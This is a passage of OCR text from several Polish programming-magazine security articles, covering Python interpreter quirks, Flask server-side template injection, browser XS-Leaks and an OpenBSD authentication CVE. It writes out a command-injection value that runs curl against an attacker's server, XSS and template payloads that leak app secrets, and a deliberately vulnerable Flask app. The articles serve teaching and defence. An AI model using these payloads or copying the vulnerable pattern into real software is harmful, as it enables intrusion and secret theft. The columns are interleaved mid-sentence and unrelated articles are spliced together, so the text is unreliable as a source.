figurujących ścieżki” (ang. path configuration file) [7], które mogą Przykładowy atak – złośliwy moduł
zostać zapisane podczas instalacji modułów Pythona. Umieszczając Aby zademonstrować atak, zainstalowałem na swoim systemie
taki plik w katalogu site-packages danej instalacji Pythona, zostanie paczkę deliverymethod, wykonując polecenie pip install delivery-
on przeprocesowany podczas każdego uruchomienia skryptu czy method. Uwaga: mimo że paczka ta jest (obecnie) niegroźna, zawsze
interpretera. Jak możemy zobaczyć na Rysunku 4, fakt ten opisano należy przestrzegać podstawowych zasad bezpieczeństwa. Dlatego prze-
również w dokumentacji Pythona. prowadzając ten eksperyment, zalecam wykorzystanie izolowanego śro-
dowiska, takiego jak wirtualna maszyna czy kontener dockerowy8. Pacz- $ python hello.py
Payload delivered
ka ta została wydana przez mojego znajomego Artura Czepiela, któremu hello world
pragnę podziękować za konsultacje dotyczące tej części artykułu.
$ python3
Symulację ataku możemy zobaczyć w Listingu 8. Jak widać, po Payload delivered
Python 3.6.9 (default, Jan 26 2021, 15:33:00)
instalacji deliverymethod każde uruchomienie Pythona – czy to ze [GCC 8.4.0] on linux
skryptem czy w trybie interaktywnym, czy podczas uruchamiania Type "help", "copyright", "credits" or
"license" for more information.
narzędzia pip – zawsze wypisuje ciąg "Payload delivered" (zakre- >>>
ślony kolorem czerwonym), który jest wypisywany przez „złośliwą”
$ python3 -I
paczkę deliverymethod. Payload delivered
Python 3.6.9 (default, Jan 26 2021, 15:33:00)
Listing 8. Symulacja ataku z wykorzystaniem pliku .pth, który instalowany [GCC 8.4.0] on linux
jest wraz z paczką deliverymethod Type "help", "copyright", "credits" or
"license" for more information.
>>>
$ python3 -c 'print("wszystko ok?")'
wszystko ok?
/* REKLAMA */
{ WWW.PROGRAMISTAMAG.PL } <45>
BEZPIECZEŃSTWO
niepoprawny, to rzuca wyjątkiem OSError. Przykładowe działanie tej OSError: illegal IP address string passed to inet_aton
funkcji zaprezentowano w Listingu 10, gdzie poza oczywistym for- In [4]: socket.inet_aton('0x7f.1 ; oh nie!')
matem adresów IPv4, w którym cztery liczby są oddzielone kropką, Out[4]: b'\x7f\x00\x00\x01'
możemy zobaczyć, że funkcja ta akceptuje również adresy podane
jako jedna liczba, jako dwie liczby lub jako trzy liczby oddzielone Błąd ten mógłby zostać wykorzystany, gdyby ktoś implementując
kropką. Ponadto podane liczby mogą być zapisane heksadecymalnie stronę serwerową panelu routera w języku Python, przyjmował adres
(jak 0x7f) lub ósemkowo (jak 010). IPv4 od użytkownika, następnie walidował, czy adres jest poprawny,
poprzez funkcję socket.inet_aton i przekazywał ten adres wprost
do funkcji os.system('ping ' + ip_string). W takiej sytuacji,
wysyłając ciąg 1.1.1.1 ; curl adres_serwera_atakujacego,
atakujący wykonałby na routerze program curl, wysyłając żądanie
na swój serwer, w efekcie potwierdzając istnienie błędu. Oczywiście
atakujący mógłby użyć w takiej sytuacji innych programów, tak aby
przejąć pełną kontrolę nad routerem.
In [4]: socket.inet_aton('134744072')
10. Wyszukując wystąpień socket.inet_aton w repozytorium CPythona, ale również w innych
projektach open source z wykorzystaniem publicznych wyszukiwarek kodu: https://grep.app/,
9. Glibc, inaczej GNU C Library, jest implementacją biblioteki standardowej języka C od GNU. https://sourcegraph.com/search czy https://searchfox.org/.
Pierwszy przypadek został opisany na bugs.python.org w osob- jąc do funkcji crypt.crypt metodę, która akurat nie jest wspierana,
nym zgłoszeniu o numerze 37463 [13]. Choć trudno powiedzieć, czy zamiast błędu otrzymujemy tak naprawdę wynik haszowania, z in-
błąd ten mógł posłużyć do złośliwego ataku11, wykorzystanie inet_ nym algorytmem haszującym (takim, który jest wspierany). Sytuację
aton w funkcji ssl.match_hostname zostało już poprawione. Drugi tę możemy zobaczyć w Listingach 12 oraz 13, gdzie najpierw listu-
przypadek zgłosiłem do twórców biblioteki w lipcu 2019 r. i do dziś jemy wspierane metody haszowania (wypisując crypt.methods),
nie został on naprawiony [14]. a następnie haszujemy dane hasło metodą crypt.METHOD_SHA512.
Jak widać, w przypadku Linuxa funkcja zwraca skrót w poprawnym
Obecny stan zgłoszenia formacie, zawierającym prefiks algorytmu haszującego (tu: $6$, czyli
Niestety, jak możemy przeczytać w ostatniej dyskusji pod zgło- sha512crypt [15]), a na macOS zwracany jest nieco inny wynik.
szeniem (Rysunek 6), mimo propozycji alternatywnej implementa-
Listing 12. Wykonanie funkcji crypt.crypt na Linuxie zwraca hasz w popraw-
cji funkcji socket.inet_aton nie została ona jeszcze wdrożona do nym formacie
CPythona.
$ python3
Python 3.6.9 (default, Jan 26 2021, 15:33:00)
[GCC 8.4.0] on linux
crypt.crypt czasami nie działa na macOS Type "help", "copyright", "credits" or "license" for more
information.
crypt function not hashing properly on Mac >>> import crypt
Oryginalny tytuł:
(uses a specific salt) >>> print(crypt.methods)
[<crypt.METHOD_SHA512>, <crypt.METHOD_SHA256>,
Link / od wersji: https://bugs.python.org/issue33213 / Python 2.x/3.x <crypt.METHOD_MD5>, <crypt.METHOD_CRYPT>]
Zgłoszono: 2018-04-03 >>> crypt.crypt('haslo', salt=crypt.METHOD_SHA512)
'$6$w/mLfgTIsUbbMoMW$dej1.ofn7shbh61JP9DyIVjubthPuLNh0.
PJKkMgvDY5qORgN98CYDWQz/JgR3.Arq5U9/N7eYJ2iogCAgJFb.'
>>> crypt.crypt('haslo', salt=crypt.METHOD_SHA512)
Ostatni błąd, któremu się przyjrzymy, dotyczy funkcji crypt. '$6$3WruajcfAJr7sTV0$MF5.tDs99PnY3lS32sSGi6.unrcvEx5bY
CpQqdkOZ/Iv16C0H6xXZ681Aj/.DGOSY0B9yEuOkUbm/tWWwx/By1'
crypt(word, salt=None), która służy do „zahaszowania” (obliczenia
funkcji skrótu) podanego hasła. Funkcja ta przyjmuje również argu- Listing 13. Wykonanie funkcji crypt.crypt na macOS zwraca niepoprawny wynik
ment salt, w którym możemy podać sól, która zostanie wykorzystana
$ python3
do haszowania hasła. W przypadku domyślnej wartości (None) funkcja Python 3.8.2 (default, Apr 8 2021, 23:19:18)
[Clang 12.0.5 (clang-1205.0.22.9)] on darwin
sama wygeneruje wartość soli. Dodatkowo, zamiast soli, można w tym Type "help", "copyright", "credits" or "license" for more
argumencie podać obiekt, który wskazuje daną funkcję skrótu. information.
>>> import crypt
Problem polega na tym, że na różnych systemach wspierane są >>> print(crypt.methods)
różne metody haszowania (czy też algorytmy funkcji skrótu), a poda- [<crypt.METHOD_CRYPT>]
>>> crypt.crypt('haslo', salt=crypt.METHOD_SHA512)
'$66Q1CRolDxB6'
11. Prawdopodobnie jedynie w sytuacji, gdy podany adres IP po weryfikacji z hostem w certyfikacie >>> crypt.crypt('haslo', salt=crypt.METHOD_SHA512)
SSL byłby później wykorzystywany w nieodpowiedni sposób, na przykład podczas uruchamiania '$66Q1CRolDxB6'
komend lub w zapytaniach SQL.
{ WWW.PROGRAMISTAMAG.PL } <47>
BEZPIECZEŃSTWO
Gdyby drążyć dalej, okazuje się, że na macOS dla metody crypt. jest dostępna. Jednak w chwili pisania tego artykułu nikt jeszcze nie
METHOD_SHA512 funkcja ta zwraca skrót hasła tak, jakbyśmy poda- otworzył oficjalnie pull requesta w repozytorium CPythona, propo-
li sól "$6". Ponadto wydaje się, że wartość ta nie jest przypadkowa nując taką zmianę. Jako ciekawostkę dodam również, że możliwe,
i jest najprawdopodobniej pobierana z identyfikatora/prefiksu danej iż moduł crypt zostanie kiedyś usunięty ze standardowych bibliotek
metody, czyli pola ident obiektu tej funkcji haszującej, co możemy Pythona za sprawą PEP-594: Removing dead batteries from the stan-
zaobserwować w Listingu 14 (kolorem żółtym oznaczono komenta- dard library [16]. PEP proponuje również, by usunąć ze standardu
rze informujące o kolejnej linii). moduły związane z historycznymi formatami danych, czy też takie,
które mają implikacje związane z bezpieczeństwem, lub gdy istnieją
Listing 14. Dalsze testy funkcji crypt.crypt na macOS
lepsze alternatywy dla tych modułów.
>>> crypt.crypt('haslo', salt='$6')
'$66Q1CRolDxB6'
>>> crypt.crypt('haslo2"', salt='$6') SŁOWO NA KONIEC
'$6cjqhqFFP7qY'
# eksplorujemy obiekt metody haszującej, aby znaleźć pola,
# które mogą dać nam wskazówkę, czemu zahaszowane ciągi
Jak mogliśmy zobaczyć na wybranych przykładach, niektóre man-
# zaczynają się od '$6' kamenty nie są naprawiane od lat. Z kolei inne błędy od momentu
>>> crypt.METHOD_SHA512.__dict__
zgłoszenia potrafią być rozwiązane bardzo szybko (jak wspomniany
{}
# obiekt nie miał pola __dict__, ale ma _fields, przeze mnie błąd z ssl.match_hostname, do którego poprawka zo-
# który wskazuje nam na pola, które możemy podejrzeć stała wdrożona w ciągu jednego dnia). Oczywiście można też pole-
>>> crypt.METHOD_SHA512._fields
('name', 'ident', 'salt_chars', 'total_size') mizować, czy mankamenty, które nie są naprawiane przez dłuższy
>>> crypt.METHOD_SHA512.name, crypt.METHOD_SHA512.ident, crypt. czas, są w ogóle istotne i czy warto się nimi zajmować, bowiem nie-
METHOD_SHA512.salt_chars, crypt.METHOD_SHA512.total_size
('SHA512', '6', 16, 106) które z nich mogą być traktowane jako przydatne funkcjonalności
>>> crypt.crypt('haslo', salt=crypt.METHOD_MD5) (jak pliki .pth), a do innych wdrożono jakąś poprawkę, jak na przy-
'$1hjHFwaWdCig'
>>> crypt.METHOD_MD5.ident
kład tryb izolacji, która zapobiega problemom wykonania kodu bi-
'1' bliotek z obecnego katalogu. Gdyby jednak stwierdzono jednoznacz-
nie, że błędy te nie są istotne i nie będą naprawione, to zamkniętoby
Podsumowując, błąd ten może spowodować, że funkcja crypt. dotyczące ich zgłoszenia, nadając im status „wont fix” [17]. Być może
crypt używana z konkretnym algorytmem haszującym zwróci nie- jest to kwestia braku rąk do pracy? A może też niektóre z dyskuto-
właściwy wynik na systemie macOS. To zaś, w zależności od tego, co wanych zgłoszeń, które mogą wpłynąć na obecnie istniejący kod,
robi dany program, może generować kolejne problemy. zostaną uwzględnione w Pythonie 4? Tak czy inaczej, zachęcam do
Jeśli chodzi o naprawę tego błędu, to w dyskusji pod zgłoszeniem przeglądania bugtrackera Pythona oraz, jeśli czujemy się na siłach,
zasugerowano dodanie sprawdzenia, czy dana metoda haszująca rozwijania CPythona.
Źródła
[1] https://bugs.python.org/issue?@template=stats
[2] https://tiswww.case.edu/php/chet/readline/rltop.html
[3] https://www.python.org/dev/peps/pep-3149/
[4] https://gcc.gnu.org/onlinedocs/gcc/Common-Function-Attributes.html
[5] https://docs.python.org/3/using/cmdline.html#environment-variables
[6] https://github.com/python/cpython/blob/v3.9.6/Modules/main.c#L202-L222
[7] https://docs.python.org/3/library/site.html
[8] https://github.com/python/cpython/blob/v3.9.6/Lib/site.py#L164-L170
[9] https://tinyurl.com/yhxmuyya
[10] https://www.python.org/dev/peps/pep-0648/
[11] https://twitter.com/bl4sty
[12] https://docs.python.org/3/library/socket.html#socket.inet_aton
[13] https://bugs.python.org/issue37463
[14] https://github.com/psf/requests/issues/5131
[15] https://manpages.debian.org/bullseye/libcrypt-dev/crypt.5.en.html#sha512crypt
[16] https://www.python.org/dev/peps/pep-0594/
[17] https://devguide.python.org/triaging/#resolution
1. XSS (ang. Cross-Site Scripting) – atak polegający na umieszczeniu złośliwego kodu (najczęściej
JavaScript) w atakowanej aplikacji, który zostanie wykonany w przeglądarce użytkownika.
W niniejszym artykule przedstawiona zostanie (niezgodna z żad- W Listingu 1.3 została przedstawiona struktura katalogów projektu.
nymi dobrymi praktykami programistycznymi) aplikacja webowa
Listing 1.3 Struktura katalogów projektu
zbudowana na bazie biblioteki Flask w języku Python. Flask korzy-
sta z silnika szablonów Jinja2 i to ten silnik posłuży nam jako przy- ├── app.py
├── myvenv
kład do prezentacji podatności. Należy jednak pamiętać, że sposoby │ ├── bin
użycia podatności SSTI różnią się w zależności od wykorzystywanej │ │ ├── activate
│ │ ├── activate.csh
technologii, ponieważ są bardzo silnie związane z konkretną imple- │ │ ├── activate.fish
│ │ ├── Activate.ps1
mentacją silnika. [...] (automatycznie wygenerowane przez venv)
W dalszej części artykułu przedstawiony zostanie proces wygene-
rowania we Flasku projektu korzystającego z szablonów. Teraz pozostał kluczowy element, tj. utworzenie aplikacji, która wy-
korzysta szablon Jinja2 do działania. W tym celu konieczne będzie
BUDOWANIE PODATNEJ APLIKACJI utworzenie endpointa, którego na potrzeby artykułu nazwiemy /test,
przyjmującego parametr name. Taki zabieg sprawi, że aplikacja będzie
WE FLASKU w stanie przywitać użytkownika, wykorzystując jego nazwę. Kod po-
Ta część artykułu wykracza nieco poza główny temat, ponieważ trzebny do obsłużenia takiej sytuacji przedstawiono w Listingu 1.4.
skupia się na wygenerowaniu szkieletu i napisaniu prostej aplikacji,
Listing 1.4. Kod źródłowy głównej aplikacji umieszczony w app.py
w której zademonstrowany zostanie wpływ niebezpiecznego użycia
szablonów. from flask import Flask
from flask import request
Nasza aplikacja stanowi trywialny przykład, ponieważ będzie from flask import render_template_string
obsługiwać jedynie dwa żądania GET, w tym jedno z parametrem. app = Flask(__name__)
Parametr ten będzie pobierany z URL-a, więc pochodzi z niezaufa- vuln_template = """
nego źródła (od użytkownika). W rzeczywistości mogłaby to być np. <!doctype html>
nazwa użytkownika pobrana z formularza, wartość przechowywana <html lang="en">
<head>
w ciasteczku mówiąca o loginie czy dowolne inne dane, którą złośli-
</head>
wy użytkownik może ustawić tak, by osiągnąć zamierzony cel. <body>
<p> Hello, {} </p>
Na początku utworzymy katalog flask_test, w którym przygotu- </body>
jemy potrzebną strukturę katalogów oraz dodamy wymagane pliki. </html>
W przypadku Flaska istnieje również możliwość wygenerowania """
pustego projektu z wykorzystaniem IDE (np. PyCharm od JetBra- @app.route("/")
ins [4]) lub projektu flask_init [4]. def hello():
return "<p>Hello, World!</p>"
Zacznijmy od przygotowania środowiska developerskiego. Osoby
@app.route("/test")
zaznajomione z tematyką tworzenia wirtualnych środowisk Pythona def ssti():
nie powinny mieć problemu ze skonfigurowaniem interpretera do name = request.args.get("name", None)
if name:
pracy z wykorzystaniem takich narzędzi, jak venv, poetry czy pipx. return render_template_string(vuln_template.format(name))
Czytelnikom, którzy nie mają doświadczenia z takimi rozwiązania- else:
return "<p>Name not set</p>"
mi, rekomenduję wykorzystanie maszyny wirtualnej lub kontenera
Dockerowego z obrazem Ubuntu. Działanie tego krótkiego przykładu jest bardzo proste: aby uruchomić
W celu instalacji potrzebnych zależności wymagany jest Python powyższy kod, wystarczy użyć polecenia z Listingu 1.5. Odwiedzając
w wersji 3 (wersja 2 osiągnęła status EOL i nie powinna być już uży- adres http://localhost:5000 (domyślna konfiguracja serwera developer-
wana) oraz menedżer paczek. Po skonfigurowaniu środowiska uru- skiego Werkzeug, z którego korzysta Flask), zobaczymy stronę witającą
chomieniowego kolejnym krokiem powinno być zainstalowanie po- użytkownika. W momencie gdy przejdziemy pod adres http://127.0.0.1/
zostałych zależności. test?name=WARTOŚĆ_PARAMETRU, ścieżka wykonania będzie inna
W moim testowym systemie, bazującym na dystrybucji Arch Li- i zamiast standardowo zwróconego czystego kodu HTML, wykorzystany
nux, niezbędne było wykonanie poleceń powłoki przedstawionych zostanie wcześniej przygotowany szablon. Dla uproszczenia szablon ten
w Listingu 1.2. Proces instalacji został opisany również w dokumen- jest umieszczony w kodzie programu, jednak tego rodzaju podatności
tacji [6]. występują również w przypadku wczytywania szablonów z pliku.
Po przedstawieniu testowej konfiguracji należy przejść do zagad-
Listing 1.2 Konfiguracja środowiska
nień dotyczących samej podatności.
mkdir flask_test
cd flask_test Listing 1.5 Polecenie uruchamiające serwer
python -m venv myvenv # tworzymy wirtualne środowisko
. myvenv/bin/activate # aktywujemy je flask run
pip install Flask # instalujemy bibliotekę Flask * Environment: production
WARNING: This is a development server. Do not use it in a
production deployment.
Use a production WSGI server instead.
* Debug mode: off
* Running on http://127.0.0.1:5000/ (Press CTRL+C to quit)
{ WWW.PROGRAMISTAMAG.PL } <51>
BEZPIECZEŃSTWO
Rysunek 1. Etapy działań prowadzące do skutecznego ataku Wykonując kroki, które zostały przedstawione powyżej, sprawdźmy, jak
(źródło: https://portswigger.net/research/server-side-template-injection)
aplikacja zareaguje w momencie, gdy przesłane zostanie złośliwe zapyta-
nie. Na Rysunku 4 zaprezentowano wykonanie kodu JS. Na tym leniwy
Proces detekcji zależy od kontekstu (podobnie jak w przypadku XSS, atakujący może poprzestać. Brak konieczności zakończenia tagu może
którego eksploitacja również wymaga poznania kontekstu, jaki może wskazywać na to, że mamy do czynienia z „plaintext context”.
edytować użytkownik), w jakim występuje przetwarzanie danych
pochodzących od użytkownika. SSTI może dotyczyć tzw. „plaintext
context”, w którym użytkownik może dostarczyć pełen tag. Trudniej-
szym do wykrycia miejscem występowania podatności jest tzw. „code
context”, gdzie dane użytkownika zostaną wrzucone bezpośrednio do
tagu szablonu. W takim przypadku konieczne jest tzw. „wyskoczenie”
z tagu, czyli użycie znaku ucieczki. Następnie należy wstrzyknąć do-
Rysunek 4. Wstrzyknięcie JS (payload: name=<script>alert(document.domain)</script>
wolną wartość, np. tag HTML.
Próbując przekształcić ten błąd w bardziej krytyczny, możemy potrzeby tego artykułu skupimy się na eksploitacji web aplikacji na-
spróbować wykonać zapytanie z parametrem name przyjmującym pisanej w Pythonie. Dobrze byłoby wykonać jakiś kod, najlepiej taki,
wartości {{7*'7'}} oraz {{7*7}} – Rysunek 5 i Rysunek 6. który pozwoli wywołać polecenie powłoki systemowej, dla ułatwie-
nia niech będzie to kod ustanawiający połączenie zwrotne (reverse
shell) do maszyny atakującego. Niestety wykorzystanie funkcji języ-
ka, np. print, bezpośrednio w tagach będzie niemożliwe.
Tutaj potrzebna będzie specyficzna wiedza na temat konkretne-
go języka. W tym przypadku przydać się mogą elementy domyślnie
dostępne lub te, które programiści dodają do danej aplikacji. Przy-
kładem może być obiekt config, który przechowuje wiele informacji
Rysunek 5. Wyrażenie z ciągiem napisowym dotyczących konkretnej instancji. Konfiguracja może zawierać np.
sekrety aplikacji (SECRET_KEY).
Uzyskując takie, a nie inne wyniki, możemy dojść do wniosku, że Rysunek 7. Konfiguracja aplikacji (pełny URL: http://127.0.0.1:5000/test?name={{ config.items()}})
/* REKLAMA */
{ WWW.PROGRAMISTAMAG.PL } <53>
BEZPIECZEŃSTWO
W sieci
[1] https://code.google.com/archive/p/mustache-security/
[2] https://portswigger.net/research/server-side-template-injection
[3] https://twig.symfony.com/ (The flexible, fast, and secure template engine for PHP)
[4] https://twig.symfony.com/doc/3.x/templates.html
[5] https://www.jetbrains.com/pycharm/
[6] https://flask-init.readthedocs.io/en/latest/
[7] https://flask.palletsprojects.com/en/2.0.x/installation/
[8] https://docs.python.org/3/library/stdtypes.html?highlight=mro#class.__mro__
[9] https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md
[10] https://mustache.github.io/
FOXTROT_CHARLIE
@foxtrot_0x4fult | segment_0xf4ult[at]protonmail.com
Pentester w firmie ISEC. Pracownik dydaktyczny Politechniki Poznańskiej na wydziale Informatyki i Telekomunikacji. W wolnym czasie żongluje bitami,
lata dronami i uczestniczy w potyczkach CTF.
TROCHĘ TŁA Wprawdzie przeczytanie treści obrazka z poziomu kodu JS nie będzie
możliwe, jednak samo osadzenie jest dopuszczalne.
Fundamentalną zasadą bezpieczeństwa obowiązującą w przeglądar- Okazuje się, że rozmaitych interakcji podobnego typu jest w świe-
kach jest Same-Origin Policy. W największym uproszczeniu zasada cie przeglądarek znacznie więcej i sprytne ich wykorzystanie otwiera
ta definiuje pochodzenie (ang. origin) strony jako złożenie: drzwi przed bohaterem tego artykułu, czyli XS-Leaks.
» protokołu,
» nazwy domeny,
CZYM JEST XS-LEAKS?
» numeru portu.
W największym uproszczeniu można powiedzieć, że XS-Leaks po-
Ponadto według tej zasady strona może odczytywać dane z drugiej zwala na wykorzystanie tzw. bocznych kanałów w celu wydobycia
strony, tylko jeśli mają one ten sam origin. pewnych informacji o użytkowniku lub danych, do których ma do-
Przykład: jesteśmy na stronie pod adresem https://www.google. stęp. Zazwyczaj dzięki tym informacjom udaje się odpowiedzieć na
com/test1. Origin tej strony to https://www.google.com (port 443 pytania typu „TAK/NIE”. Przykładowe pytania, na które będziemy
jest domyślny dla HTTPS i zwykle nie jest on jawnie wypisywany; chcieli odpowiedzieć, to:
a nawet gdyby był, to jest traktowany nadal jako ten sam origin). Za- » Czy użytkownik jest zalogowany w aplikacji?
łóżmy, że ta strona próbuje wykonać funkcję fetch() w kodzie Ja- » Czy użytkownik należy do danej grupy na Facebooku?
vaScript pod dwie inne strony: https://www.google.com/test2 oraz » Czy obecny użytkownik to JohnDoe123?
https://www.facebook.com/test. Zauważmy, że ten pierwszy adres to » Czy użytkownik odwiedził daną stronę?
ten sam origin, co wyjściowa strona, zatem przeglądarka zezwoli na » Czy użytkownik ma dostęp do danego ticketu w bugtrackerze?
wykonanie zapytania oraz przeczytanie odpowiedzi. Z kolei https:// » Czy użytkownik ma znajomych, których nazwisko zaczyna się
www.facebook.com to już inny origin, zatem przeglądarka uniemoż- literą „A”?
liwi odczyt odpowiedzi z tej strony (Rysunek 1). » Czy użytkownik miał koronawirusa?
Zauważmy, że gdyby SOP nie istniał i przeglądarka pozwalała na
tego typu dostęp, to dowolna strona w Internecie mogłaby wykonać Spójrzmy na przykład XS-Leaks sprzed 2010 roku, a zatem z czasów,
zapytanie np. do domeny naszego banku i odczytać dowolne dane! gdy nikt jeszcze nie używał tej nazwy podatności.
W rzeczywistości jednak zasada Same-Origin Policy nie jest aż Na Rysunku 2 widzimy stronę, na której znajdują się linki do
tak restrykcyjna, jak może się wydawać na pierwszy rzut oka. Nie- czterech serwisów webowych. W domyślnych stylach CSS przegląda-
które cross-originowe interakcje są dopuszczalne. Na przykład: jeśli rek linki nieodwiedzone wcześniej przez użytkownika są niebieskie,
spróbujemy na swojej stronie umieścić obrazek pochodzący z innej natomiast te odwiedzone mają kolor fioletowy. Z poziomu kodu Java-
domeny w tagu <img>, przeglądarka nie zaprotestuje w żaden sposób. Script możliwe zatem było odczytanie koloru linka (np. wykorzystu-
Rysunek 1. Porównanie próby pobrania zasobu z tej samej domeny oraz z innej domeny. W drugim przypadku przeglądarka wyświetla błąd
jąc funkcję getComputedStyle()1) i ustalenie, które strony zostały która jest prawdziwym kompendium wiedzy dotyczącym istnieją-
odwiedzone przez użytkownika. cych bocznych kanałów w przeglądarkach, pokazującym również, jak
Staranne dobranie sprawdzanych stron internetowych mogło można się chronić przed tego typu atakami.
skutkować naruszeniem prywatności użytkownika, a nawet ustale- Zacznę od przykładu z rodzimego podwórka. W 2020 roku Secu-
niem jego tożsamości. W odpowiedzi na to ryzyko wszystkie prze- ritum (firma, w której pracuję) przeprowadzała testy aplikacji Prote-
glądarki wprowadziły zmiany uniemożliwiające odczytanie statusu GO Safe – aplikacji, dzięki której mogliśmy się dowiedzieć, czy mie-
linka2. liśmy kontakt z osobą zarażoną koronawirusem. Raport z tych testów
Zwróćmy uwagę, że sposób przeprowadzenia ataku nie pozwolił jest publiczny4, zaś na jego 60. stronie znajduje się opis podatności
nam na pełne wyciągnięcie historii przeglądarki użytkownika. Tak pt. „Możliwość wycieku statusu ryzyka infekcji użytkownika do ze-
naprawdę atak polegał na zadaniu przeglądarce czterech pytań: wnętrznych domen”.
» Czy użytkownik odwiedził Reddit? W aplikacji możliwe było wypełnienie ankiety, na podstawie któ-
» Czy użytkownik odwiedził Facebook? rej otrzymywaliśmy informację, jak duże jest ryzyko infekcji korona-
» Czy użytkownik odwiedził Sekuraka? wirusem. W zależności od ustalonego ryzyka w aplikacji wyświetlała
» Czy użytkownik odwiedził Google? się też buźka w różnych kolorach, np. dla niskiego ryzyka miała ona
kolor zielony, a dla średniego – pomarańczowy (Rysunek 3).
Nie mamy żadnych informacji dotyczących odwiedzenia tych stron, Wszystkie buźki były tylko obrazkami ładowanymi z zewnętrz-
o które bezpośrednio nie zapytaliśmy. Zatem, zgodnie z wcześniej nych adresów URL. Jeżeli użytkownik wypełni ankietę, to w jego
wyłożoną teorią dotyczącą XS-Leaks, mamy odpowiedzi tylko na te przeglądarce wyświetli się dokładnie jedna z nich, która następnie
cztery pytania typu „TAK/NIE”. zostanie umieszczona w pamięci podręcznej przeglądarki.
PRZYKŁADY XS-LEAKS
Okazuje się, że różnego rodzaju bocznych kanałów w przeglądarkach jest
o wiele więcej. Na początku 2021 r. powstała strona https://xsleaks.dev3,
Rysunek 3. Ryzyko infekcji z aplikacji ProteGO Safe wraz z „buźką”
/* REKLAMA */
{ WWW.PROGRAMISTAMAG.PL } <57>
BEZPIECZEŃSTWO
Obrazki jednak możemy ładować z zewnętrznych stron. Na Rysunku 4 czy jest zwracana poprawna odpowiedź. Takim sposobem jest wy-
widzimy, jak będzie wyglądała taka próba, jeśli chodzi o czas łado- korzystanie tagu <script>, który, podobnie jak <img>, pozwala na
wania poszczególnych obrazków. Zwróćmy uwagę, że ta buźka, która ładowanie zasobów z zewnętrznych domen. Atak wyglądał w nastę-
została załadowana z pamięci podręcznej (disk cache), ma znacząco pujący sposób:
mniejszy czas ładowania od wszystkich pozostałych (1 ms vs średnio
// Tworzymy element <script>
43 ms). Różnica będzie jeszcze bardziej wyraźna, jeśli połączenie in- const s = document.createElement('script');
ternetowe użytkownika będzie powolne. // Chcemy dowiedzieć się, czy identyfikator obecnie
Mamy zatem doskonałe pole manewru na wykorzystanie ataku typu // zalogowanego użytkownika to 12345678
XS-Leaks: spróbujemy załadować wszystkie cztery obrazki i zmierzymy s.src = "https://developer.twitter.com/" +
"api/users/12345678/client-applications.json";
ich czasy odpowiedzi. Jeśli dokładnie jeden z nich będzie wyraźnie
mniejszy od pozostałych, to na tej podstawie wyciągniemy wnio- // Jeśli skrypt załaduje się poprawnie, oznacza to,
// że identyfikator pasuje…
sek, że obrazek musiał zostać załadowany z cache, a zatem określa s.onload = () => alert('Użytkownik trafiony!')
status ryzyka infekcji użytkownika. Szczegółowy kod źródłowy tego // … w przeciwnym wypadku wyciągamy wniosek,
ataku można znaleźć we wspomnianym raporcie z testów. Jako spo- // że identyfikator nie odzwierciedla obecnie zalogowanego
// użytkownika.
sób naprawy tego konkretnego błędu zalecono nieładowanie plików s.onerror = () => alert('Użytkownik nietrafiony!')
SVG z zewnętrznych plików SVG, tylko użycie tych obrazków jako document.head.append(s);
zagnieżdżone SVG. Finalnie problem został załatany przez całkowite
wyłączenie części webowej tej aplikacji.
Inny przykład XS-Leaks pozwalał na ustalenie loginu obecnie za-
PODSUMOWANIE
logowanego użytkownika Twittera. Został on zgłoszony przez naszego
rodaka, udzielającego się pod pseudonimem terjanq5, który zauważył, XS-Leaks to podatność bezpieczeństwa, która pozwala wydobywać
że jedna z aplikacji Twittera ładuje zasób znajdujący się pod adresem wrażliwe informacje o użytkowniku przeglądarki, niedostępne nor-
https://developer.twitter.com/api/users/USER_ID/client-applications.json, malnie dla napastnika, wykorzystując komunikację boczno-kanałową
gdzie w miejscu USER_ID znajdował się identyfikator użytkownika. (np. wyciągając wnioski na podstawie czasu ładowania strony czy ko-
Jeśli USER_ID nie zgadzał się z identyfikatorem obecnie zalogowanego dów błędów).
użytkownika, zwracana była odpowiedź z kodem 403 o następującej Nie istnieje jeden uniwersalny sposób ochrony przed tego typu
treści: ryzykami – w zależności od tego, z jakim konkretnie bocznym ka-
nałem mamy do czynienia, można zastosować jeden z mechani-
{"error":{"message":"You are not logged in as a user that has access
to this developer.twitter.com resource.","sent":"2019-03-06T01:20:56 zmów bezpieczeństwa przeglądarek (np. jeśli atak wymaga elementu
+00:00","transactionId":"00d08f800009d7be"}}. <iframe>, można użyć nagłówka X-Frame-Options). Czasem jed-
nak ochrona może wymagać przepisania części aplikacji.
W przeciwnym wypadku była zwracana odpowiedź z kodem 200. Wiele informacji na temat metod ochrony można znaleźć rów-
Okazuje się, że z poziomu zewnętrznych domen istnieje możli- nież w serwisie wiki xsleaks.dev6.
wość stwierdzenia, czy dany zasób zwraca kod błędu (jak np. 403),
5. Ustalenie loginu użytkownika Twittera przez XS-Leaks: https://hackerone.com/reports/505424 6. XS-Leaks – metody ochrony: https://xsleaks.dev/docs/defenses/
MICHAŁ BENTKOWSKI
Realizuje testy bezpieczeństwa oraz szkolenia dla firmy Securitum. Autor w serwisie sekurak.pl oraz research.securitum.com.
Miłośnik bezpieczeństwa przeglądarek i podatności klienckich. Uczestnik programów bug bounty. Na Twitterze: @SecurityMB.
Nawet jeśli opcja wyświetlenia procesów dla innych użytkowników jest wyłączona, to Listing 4. Weryfikacja danych uwierzytelniających w login_passwd
należy pamiętać, że takie dane mogą przez przypadek znaleźć się w różnego rodzaju (część nieistotnych fragmentów została pominięta)
danych diagnostycznych lub mogą być podejrzane przez użytkownika uprzywilejowa-
nego root (choć ten i tak ma wiele innych możliwości, żeby „podkraść” dane uwierzy- // […]
telniające). 1 while ((ch = getopt(argc, argv, "ds:v:")) != -1) {
Nie ma żadnego uzasadnienia, dlaczego login nie jest przekazany w ramach standar- 2 switch (ch) {
dowego wejścia, po za tym, że może to w niektórych przypadkach skomplikować kod. 3 […]
4 case 's': /* service */
5 if (strcmp(optarg, "login") == 0)
6 mode = 0;
7 else if (strcmp(optarg, "challenge") == 0)
8 mode = 1;
CVE-2019-19521 9 else if (strcmp(optarg, "response") == 0)
10 mode = 2;
11 else {
Pod koniec roku 2019 firma Qualys zgłosiła błąd uwierzytelnienia 12 syslog(LOG_ERR, "%s: invalid service", optarg);
w OpenBSD 6.6 i wcześniejszych. Pierwszy problem, jaki napotka- 13 exit(1);
14 }
li badacze, to mieszanie danych z metadanymi uwierzytelniania. Jak 15 break;
widzieliśmy w Listingu 2, login użytkownika i opcje są podawane // […]
